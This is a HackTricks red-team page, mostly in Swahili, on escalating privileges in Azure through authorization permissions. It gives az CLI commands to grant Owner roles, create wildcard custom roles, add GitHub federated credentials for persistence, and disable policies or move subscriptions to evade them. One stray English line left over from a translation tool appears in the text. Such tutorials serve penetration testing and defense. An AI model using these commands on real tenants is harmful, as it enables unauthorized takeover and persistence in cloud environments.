Az - Azure IAM Privesc (Authorization)

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Azure IAM

Kwa maelezo zaidi angalia:

Az - Entra ID (AzureAD) & Azure IAM

Permissions zinazoruhusu principal kubadilisha authorization yenyewe kawaida ni privesc primitives. Hii ni hatari hasa zinapopewa kwenye scopes za management group au subscription, kwa sababu permissions hizo hurithiwa na child resources.

Microsoft.Authorization/roleAssignments/write

Permission hii inaruhusu kuunda role assignments juu ya scope fulani, ikimruhusu mshambuliaji kuongeza privileges kwa kujipa yeye mwenyewe au principal mwingine anaoutawala role yenye privilege zaidi.

Typical flow:

# Login and confirm current context
az login
az account show

# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"

Ikiwa principal iliyoathiriwa ina action hii juu ya scope, inaweza moja kwa moja kutoa privileged role kama Owner, Contributor, Key Vault Secrets Officer, au role nyingine yoyote ya built-in/custom inayopatikana katika scope hiyo:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Kujua principal object ID ya target user/service principal/managed identity kunatosha kutoa role mpya. Hii inaweza kutumiwa kwa self-privesc, lateral movement, au persistence kwa kuassign role hiyo kwa principal tofauti unaoidhibiti.

Microsoft.Authorization/roleDefinitions/write

Hii permission inaruhusu ku-create au ku-modify custom role definitions. Kwa vitendo, hii ni hatari kwa sababu attacker anaweza:

  • Modify custom role ambayo tayari ime-assigned kwa compromised principal, na kufanya permissions mpya ziwe effective immediately.
  • Create new over-privileged custom role kisha kui-assign, kawaida kwa ku-chain na Microsoft.Authorization/roleAssignments/write.

Typical flow:

# Find the current assignments
az role assignment list --all --output table

# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"

Please provide the content you want inside role.json, and I’ll format it exactly as needed.

{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

Kisha sasisha ruhusa za role kwa definition ya awali kwa kuita:

az role definition update --role-definition role.json

Ikiwa role iliyorekebishwa tayari imepewa attacker, hii inaweza kuwa njia ya haraka zaidi kuliko kuunda role assignment mpya kwa sababu permission inflation hutumika kwa assignment iliyopo.
Ikiwa attacker ana roleDefinitions/write pekee, bado anaweza kuifanya iwe weaponized kwa kurekebisha roles ambazo tayari zimepewa compromised principals.

Microsoft.Authorization/elevateAccess/action

Hii permissions inaruhusu elevate privileges na kuweza assign permissions kwa principal yoyote kwenye Azure resources. Inakusudiwa kupewa Entra ID Global Administrators ili waweze pia manage permissions kwenye Azure resources.

Tip

Nadhani user anahitaji kuwa Global Administrator katika Entrad ID ili elevate call ifanye kazi.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

Ruhusa hii inaruhusu kuunda/kusasisha Federated Identity Credentials (FICs) kwenye user-assigned managed identities. Kivitendo, hii humruhusu mshambuliaji kuongeza relationship mpya ya trust kwenda kwa external identity provider kisha kupata tokens kama managed identity hiyo.

Hii ni persistence / identity hijacking primitive: ikiwa managed identity tayari ina access kwa Azure resources, mshambuliaji anahitaji tu kuunda external workload inayolingana (kwa mfano, GitHub Actions workflow) na kubadilisha external token kuwa Azure tokens.

Mambo muhimu ya kuthibitisha kabla ya kuitumia vibaya:

  • Ni managed identity gani inaweza kubadilishwa
  • Ni scope/roles gani tayari zimepewa kwa managed identity hiyo
  • Ni issuer, subject, na audience gani zitakubaliwa wakati wa token exchange

Unaweza kuunda FIC kwa dedicated CLI command:

az identity federated-credential create \
--name "github-federated-identity" \
--identity-name testMI \
--resource-group bialystok-rg \
--issuer "https://token.actions.githubusercontent.com" \
--subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
--audiences "api://AzureADTokenExchange"

Au kwa raw REST.

Mfano wa amri ya kutoa access kwa GitHub repo kwa managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Mara FIC inapoundwa, mshambulizi anaweza kuthibitisha kutoka kwenye external workload na kutumia ruhusa za managed identity ambazo tayari zimetolewa katika Azure. Kwa maelezo zaidi kuhusu abusing GitHub OIDC / workload identity, angalia:

Az Federation Abuse

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

Mshambulizi mwenye ruhusa Microsoft.Authorization/policyAssignments/write au Microsoft.Authorization/policyAssignments/delete juu ya management group, subscription, au resource group anaweza kurekebisha au kufuta Azure policy assignments, na hivyo uwezekano wa kuzima security restrictions zinazozuia operations fulani.

Hii inaruhusu upatikanaji wa resources au functionalities ambazo hapo awali zililindwa na policy.

Delete a policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Zima policy assignment:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

Thibitisha mabadiliko:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

Mshambuliaji mwenye ruhusa Microsoft.Authorization/policyDefinitions/write anaweza kurekebisha Azure policy definitions, akibadilisha sheria zinazodhibiti vizuizi vya usalama katika mazingira yote.

Kwa mfano, policy inayopunguza regions zinazoruhusiwa kwa kuunda resources inaweza kurekebishwa kuruhusu region yoyote, au effect ya policy inaweza kubadilishwa ili iwe haina ufanisi.

Rekebisha policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Thibitisha mabadiliko:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

Mshambuliaji aliye na ruhusa Microsoft.Management/managementGroups/write anaweza kurekebisha muundo wa hierarchical wa management groups au kuunda management groups mpya, jambo ambalo linaweza kusaidia kukwepa restrictive policies zilizotumika katika viwango vya juu.

Kwa mfano, mshambuliaji anaweza kuunda management group mpya bila restrictive policies kisha kuhamisha subscriptions kwenda humo.

Create a new management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Badilisha hierarchy ya management group:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Thibitisha mabadiliko:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

Mshambulizi aliye na ruhusa Microsoft.Management/managementGroups/subscriptions/write anaweza kuhamisha subscriptions kati ya management groups, na hivyo huenda akakwepa restrictive policies kwa kuhamisha subscription kwenda kwenye group lenye policies zisizo kali zaidi au zisizo na policies kabisa.

Hamisha subscription kwenda kwenye management group tofauti:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Thibitisha mabadiliko:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"

Marejeo

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks